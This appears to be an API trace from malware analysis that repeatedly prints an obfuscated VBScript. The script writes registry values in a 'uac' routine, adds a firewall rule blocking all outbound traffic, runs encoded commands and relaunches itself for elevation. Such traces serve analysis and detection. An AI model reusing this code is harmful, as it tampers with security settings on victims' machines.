bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.380] wcsncmp (_String1="L_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.380] wcsncmp (_String1="_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0226.380] wcsncmp (_String1="TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.381] wcsncmp (_String1="CP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.381] wcsncmp (_String1="P\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, 